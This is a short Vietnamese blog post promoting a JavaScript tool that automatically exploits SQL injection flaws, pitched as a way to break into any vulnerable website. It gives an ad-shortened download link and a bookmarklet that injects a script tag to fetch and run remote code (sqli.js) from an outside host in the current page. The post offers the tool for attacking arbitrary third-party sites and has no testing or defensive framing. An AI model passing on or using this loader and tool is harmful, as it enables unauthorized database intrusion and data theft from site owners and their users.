Skip to main content

Code Auto SQL Injection (Update)

Code Auto SQL Injection (Update)

Chia sẻ với các bạn mã JavaScript tự động khai thác lỗi bảo mật SQL Injection. Giúp bạn dễ dàng khai thác bất cứ website nào bị lỗi.

Download Code:  http://ouo.io/iPDqT

Bookmarklets:

javascript:void(function(){var%20js=document.createElement('script');js.type='text/javascript';js.src='http://www.website.com/sqli.js';document.head.appendChild(js);}());

Share